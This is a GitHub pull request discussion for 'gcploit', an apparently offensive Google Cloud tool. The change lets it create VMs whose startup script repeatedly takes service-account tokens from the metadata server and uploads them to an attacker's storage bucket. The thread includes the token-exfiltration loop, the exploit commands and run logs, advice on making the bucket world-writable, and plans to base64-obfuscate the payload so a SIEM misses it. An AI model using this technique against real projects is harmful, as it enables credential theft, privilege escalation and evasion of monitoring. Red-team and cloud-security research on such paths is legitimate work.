
Support actAs with VMs in addition to GCF

Open 4ndygu opened this pull request 5 years ago • 24 comments

This PR supports lateral movement for users with Service Account User + Compute User. The tactic here is to launch compute instances with startup scripts that periodically pull tokens from the metadata token endpoint and push them to a user's chosen GCS bucket. Identities must have access to the bucket. I added the following flags:

  • actAsMethod -- defaults to cloud function, but can support VM-based lateral movement
  • bucket -- stores startup script information for the service account at hand

I can call with:

python3 main.py --exploit actas --actAsMethod vm --bucket gcploit_eater --project speedy-cab-288518 --target all
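
Under the hood, the VM-side payload boils down to a loop like the following. This is only a sketch in Python for clarity -- the actual payload is the startup.sh shipped with this PR, and the bucket name, object name, and refresh interval below are placeholders:

import json
import time

import requests
from google.cloud import storage

# Placeholders -- in the PR these come from the --bucket flag and from the
# service account attached to the instance.
BUCKET = "gcploit_eater"
OBJECT_NAME = "target-service-account"
TOKEN_URL = ("http://metadata.google.internal/computeMetadata/v1/"
             "instance/service-accounts/default/token")

while True:
    # Ask the metadata server for a short-lived access token belonging to
    # the service account the instance was created with.
    token = requests.get(TOKEN_URL, headers={"Metadata-Flavor": "Google"}).json()
    # Push it to the chosen bucket; the identity running on the instance
    # (or an allUsers objectCreator grant) must be allowed to write here.
    storage.Client().bucket(BUCKET).blob(OBJECT_NAME).upload_from_string(json.dumps(token))
    time.sleep(300)  # interval is arbitrary; tokens last roughly an hour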

The PR also includes some name changes to support extensibility. Please let me know if other solutions work better!

There are a few wishlist items:

  • Payload obfuscation with a key that we can host in the GCS bucket, or base64 to bypass a SIEM (a rough sketch of the base64 variant follows this list).
  • Potentially throwing in the vector for Service Account Token creators by directly calling --impersonate-service-account.
  • Better handling of utils (though I suppose this is a generic quality item).
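
As a rough sketch of the base64 variant (purely illustrative; the keyed variant would layer a cipher on top of the same idea):

import base64

# Encode the checked-in startup script so the plaintext payload does not
# show up verbatim in instance metadata or in whatever a SIEM captures.
with open("utils/startup.sh", "rb") as f:
    encoded = base64.b64encode(f.read()).decode()

# The metadata-side wrapper would then just decode and execute it, e.g. a
# one-liner of the form: echo "<encoded>" | base64 -d | bash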

4ndygu avatar Sep 10 '20 00:09 4ndygu

Hmmm the bucket seems a little tricky in some cases. Would it make more sense to just have the startup script run a simple python server on port 80 that returns data with a supplied password?

dxa4481 avatar Sep 17 '20 00:09 dxa4481

Hmm, I thought about the port 80 situation, but it may be difficult to reach that server without a corresponding firewall rule change. I recognize that default ports may allow ingress on the default network, but it would be difficult to guarantee token access without a corresponding guarantee that the firewall ports are open.

Pushing routinely to GCS lets us take advantage of GCP hosts typically having lax egress requirements, especially for egress to GCP IPs and to storage services in GCP. Although I might be mistaken here -- how do you feel?

4ndygu avatar Sep 17 '20 01:09 4ndygu

What if the data was brokered through the compute metadata? That should be available, and if you could land a startup script you should have permissions to it already.

dxa4481 avatar Sep 17 '20 01:09 dxa4481

Oh I guess not all the instances will have permission to the metadata though

dxa4481 avatar Sep 17 '20 01:09 dxa4481

Hrm... the only thing with the bucket is there's an action the user has to take to explicitly add the service account to it. Maybe a big message when you run the module "MAKE SURE YOU GIVE <service account> ACCESS TO THE BUCKET WITH <command to set bucket IAM policy>" or something like that, just so there's no confusion.

dxa4481 avatar Sep 17 '20 01:09 dxa4481

I think that if compute metadata were unavailable, the entire vector would be dead in the water :(. That being said, since this vector relies on the creation of new VMs, my assumption is that technically, we do have it.

In any case, this PR edits the flags to ask users to manually supply their own bucket. I'll add a commit to let users know they have to give the SA access to the bucket :).

4ndygu avatar Sep 17 '20 01:09 4ndygu

A quick note -- I would imagine that if I were a user, I would just make the bucket publicly writable but not readable, i.e. giving Storage Object Creator to allUsers. How do you feel?

4ndygu avatar Sep 17 '20 02:09 4ndygu

[pushed my conception of that up.]

4ndygu avatar Sep 17 '20 02:09 4ndygu

> A quick note -- I would imagine that if I were a user, I would just make the bucket publicly writable but not readable, i.e. giving Storage Object Creator to allUsers. How do you feel?

Because the user has full control over the bucket, they should always be able to add the service account to it, no? No reason to not lock it down, right?

dxa4481 avatar Sep 17 '20 02:09 dxa4481

Right. I was thinking of the scenario where someone sees a project with a large number of different service accounts, which would in turn grant access to projects with large numbers of their own service accounts. It may get unwieldy to manage all of those credentials first, then load permissions accordingly.

The additional risk profile is write-only, not read, so I suppose a malicious user could overwrite existing keys, but not extend access by reading new objects in that GCS bucket.

In any case, I abstracted the command with <serviceAccount>.
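
For reference, the locked-down version of the grant (bucket writable only by the target service account, rather than allUsers) would look roughly like this with the Python storage client -- the bucket and account names are placeholders, and the module itself just prints the equivalent gsutil command:

from google.cloud import storage

bucket = storage.Client().bucket("YOUR_BUCKET")
policy = bucket.get_iam_policy(requested_policy_version=3)
# Grant objectCreator (write-only) to the one service account that needs it.
policy.bindings.append({
    "role": "roles/storage.objectCreator",
    "members": {"serviceAccount:TARGET_SA@PROJECT.iam.gserviceaccount.com"},
})
bucket.set_iam_policy(policy)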

4ndygu avatar Sep 17 '20 02:09 4ndygu

Hi! I went ahead and also added support for escalation when users have the Notebooks Runner / Notebooks Admin role, since users of the beta AI Platform Notebooks feature can generate arbitrary hosts with arbitrary metadata (and thus, startup scripts). I also moved some common functions out into the utils code.

4ndygu avatar Sep 20 '20 15:09 4ndygu

Ahh nice. Another question: I notice the bucket currently needs to be hard-coded into the source and modified by the user, and this workflow is difficult, particularly for folks who want to pull the image from Dockerhub.

Can we move this bucket to be configurable by command line argument?

dxa4481 avatar Sep 21 '20 07:09 dxa4481

Cool -- I think that currently, the startup script uses the placeholder YOURBUCKETNAMEHERE for the bucket name, and the code takes the command line argument and substitutes the real bucket name dynamically. If I understand correctly, we should be able to run this commit purely via command line arguments.

I see your point though -- At least in the startup.sh part, we're dynamically changing a file path that might be hardcoded. Is that what you mean? There probably is an easier way of parameterizing this, potentially by storing the script in memory and doing a replace.

I'm messing with a way to attach arbitrary Python packages to a Dataflow job to replicate this script, and I'll take a shot at doing the replace if I'm understanding your message :).

4ndygu avatar Sep 21 '20 13:09 4ndygu

For more clarity -- the function doing the dynamic replace is https://github.com/dxa4481/gcploit/pull/10/files#diff-e6186f834ed280c4cb710843e5da633bR6
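
The gist of that helper, sketched with illustrative names, is just a read-and-substitute over the template:

def render_startup_script(template_path, bucket_name):
    # Read the checked-in startup.sh template and swap the placeholder for
    # the bucket supplied on the command line, leaving the file on disk untouched.
    with open(template_path) as f:
        script = f.read()
    return script.replace("YOURBUCKETNAMEHERE", bucket_name)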

4ndygu avatar Sep 21 '20 13:09 4ndygu

Hi @dxa4481! Just wanted to check in on this. I edited the above functionality while working on another lateral feature, and can send that as soon as I figure some stuff out with Dataflow.

4ndygu avatar Oct 01 '20 19:10 4ndygu

Just got around to testing. I was able to use the VM source, but when I go to actually use the SA for commands I'm getting this error when it tries to fetch a credential:

Traceback (most recent call last):
  File "main.py", line 298, in <module>
    main()
  File "main.py", line 245, in main
    return_output = run_cmd_on_source(args.source, args.gcloud_cmd, project=args.project, bucket=args.bucket)
  File "main.py", line 205, in run_cmd_on_source
    source.refresh_cred(db_session, utils.run_gcloud_command_local, dataproc=dataproc, bucket_name=bucket)
  File "/models.py", line 67, in refresh_cred
    blob = self.client.bucket(bucket_name).blob(self.serviceAccount).download_to_filename("/tmp/gcploit_temporary_credentials")
  File "/usr/local/lib/python3.8/site-packages/google/cloud/storage/blob.py", line 1131, in download_to_filename
    self.download_to_file(
  File "/usr/local/lib/python3.8/site-packages/google/cloud/storage/blob.py", line 1025, in download_to_file
    download_url = self._get_download_url(
  File "/usr/local/lib/python3.8/site-packages/google/cloud/storage/blob.py", line 775, in _get_download_url
    hostname=client._connection.API_BASE_URL, path=self.path
  File "/usr/local/lib/python3.8/site-packages/google/cloud/storage/blob.py", line 281, in path
    return self.path_helper(self.bucket.path, self.name)
  File "/usr/local/lib/python3.8/site-packages/google/cloud/storage/bucket.py", line 1012, in path
    raise ValueError("Cannot determine path without bucket name.")
ValueError: Cannot determine path without bucket name.

Any idea what's causing this?

Also unrelated, would you mind removing the pyc file committed?

Sorry if responses are a little delayed, I'm in the middle of a move, so things are a little crazy.

dxa4481 avatar Oct 05 '20 06:10 dxa4481

No worries, good luck on the move! I'll hit these after work today.

  • Happy to remove the pyc file.
  • My guess is that the credential refresh method is having some issues pushing / pulling from the bucket. Did you provide the bucket_name parameter when you supplied a gcloud command and source? I suppose we should add the same parameter guard as we do with the exploit (rough sketch below).
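
Something along these lines, assuming argparse and the flag names visible in the traceback above:

# Fail fast instead of letting the storage client raise deep inside refresh_cred.
if args.gcloud_cmd and args.source and not args.bucket:
    parser.error("--bucket is required when running a command through a VM source")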

4ndygu avatar Oct 05 '20 14:10 4ndygu

I did provide the bucket name, and both the base identity and the target identity had Project Editor on the bucket, all of which lived in the same project in which I was provisioning the VM.

dxa4481 avatar Oct 05 '20 14:10 dxa4481

Killed the pyc.

re: the bucket issue, I just confirmed that I was able to run with the following command:

python3 main.py --gcloud "compute instances list" --source_cf {nameofinstance} --bucket {bucketname}

I have a hunch that this might be due to an assumption the storage.Client() call makes about an underlying project variable. If you run gcloud config set project {} and then run again, does it work? I get a different error, but that might be relevant.

In any case, I'll work on seeding the project with a user-supplied name.

4ndygu avatar Oct 05 '20 19:10 4ndygu

I added a configuration to specify the GCS client project. Please lmk if this helps with your issue!
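
Roughly, the intent is to construct the client with the user-supplied project instead of relying on whatever default the environment resolves, along the lines of:

from google.cloud import storage

# Pin the client to the project passed via --project rather than the
# gcloud/ADC default, which may be unset inside the container.
client = storage.Client(project=args.project)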

4ndygu avatar Oct 10 '20 17:10 4ndygu

So here's the output of the command after pulling the latest:

 gcploit --exploit actas --project bugbountyshinanigans-242522 --target_sa [email protected] --actAsMethod vm --bucket potatoy
*************************************************
MAKE SURE YOU GIVE ALL USERS *WRITE* ACCESS TO YOUR BUCKET WITH gsutil iam ch <serviceAccountName>:objectCreator gs://potatoy. OTHERWISE, YOUR SCRIPTS WONT BE ABLE TO PUSH CREDS TO YOU.
*************************************************
Running command:
gcloud config set project bugbountyshinanigans-242522
Running command:
gcloud services enable cloudresourcemanager.googleapis.com
Running command:
gcloud auth print-identity-token
Running command:
gcloud config set project bugbountyshinanigans-242522
Running command:
gsutil cp ./utils/startup.sh gs://potatoy
error code Command '['gsutil', 'cp', './utils/startup.sh', 'gs://potatoy']' returned non-zero exit status 1. b'Copying file://./utils/startup.sh [Content-Type=text/x-sh]...\n/ [0 files][    0.0 B/  635.0 B]                                                \rYour "OAuth 2.0 Service Account" credentials are invalid. Please run\n  $ gcloud auth login\nOSError: No such file or directory.\n'
Running command:
gcloud services enable services.googleapis.com
error code Command '['gcloud', 'services', 'enable', 'services.googleapis.com']' returned non-zero exit status 1. b"ERROR: (gcloud.services.enable) PERMISSION_DENIED: Not found or permission denied for service(s): services.googleapis.com.\n- '@type': type.googleapis.com/google.rpc.PreconditionFailure\n  violations:\n  - subject: ?error_code=220002&services=services.googleapis.com\n    type: googleapis.com\n- '@type': type.googleapis.com/google.rpc.ErrorInfo\n  domain: serviceusage.googleapis.com\n  metadata:\n    services: services.googleapis.com\n  reason: SERVICE_CONFIG_NOT_FOUND_OR_PERMISSION_DENIED\n"
Running command:
gcloud compute instances create vovpuopr --service-account [email protected] --scopes=cloud-platform --zone=us-central1-a --image-family ubuntu-2004-lts --image-project ubuntu-os-cloud --metadata startup-script-url=gs://potatoy/startup.sh
~~~~~~~~~~ Created [https://www.googleapis.com/compute/v1/projects/bugbountyshinanigans-242522/zones/us-central1-a/instances/vovpuopr].
NAME      ZONE           MACHINE_TYPE   PREEMPTIBLE  INTERNAL_IP  EXTERNAL_IP    STATUS
vovpuopr  us-central1-a  n1-standard-1               10.128.0.51  34.122.74.132  RUNNING ~~~~~~~~~~
successfully privesced the [email protected] identitiy
~~~~~~~Got New Identity~~~~~~~~
name='vovpuopr', role='None', serviceAccount='[email protected]', project='bugbountyshinanigans-242522', password=''

I do have access to that bucket though as verified by:

 gsutil ls gs://potatoy/
gs://potatoy/bla
gs://potatoy/count-00000-of-00001
gs://potatoy/hi
gs://potatoy/outputs-00000-of-00001
gs://potatoy/tmp/

dxa4481 avatar Oct 11 '20 02:10 dxa4481

Hmm, I replicated your setup and have been unable to reproduce the same behavior. To drill down a little bit more, did you seed your account with gcloud auth activate-service-account --key-file=xxxxx.json?

Additionally, if you literally run gsutil cp ./utils/startup.sh gs://YOURBUCKETNAME, does the upload follow through?

Sorry for the back and forth!

4ndygu avatar Oct 11 '20 21:10 4ndygu

I have the correct service account activated:

gcloud auth list
                          Credentialed Accounts
ACTIVE  ACCOUNT
*       editordeleteme@bugbountyshinanigans-242522.iam.gserviceaccount.com

and I confirmed I can write to the bucket:

gsutil cp startup.sh gs://potatoy/


Updates are available for some Cloud SDK components.  To install them,
please run:
  $ gcloud components update

Copying file://startup.sh [Content-Type=application/x-sh]...
- [1 files][  657.0 B/  657.0 B]
Operation completed over 1 objects/657.0 B.

I'll do a little more testing later today

dxa4481 avatar Oct 13 '20 15:10 dxa4481

Hmm, I still have not been able to reproduce this. Can you give me some of your output from gcloud info, namely your version of gsutil and your current properties? Also -- are you opening up the proxy during the test execution?

4ndygu avatar Oct 31 '20 21:10 4ndygu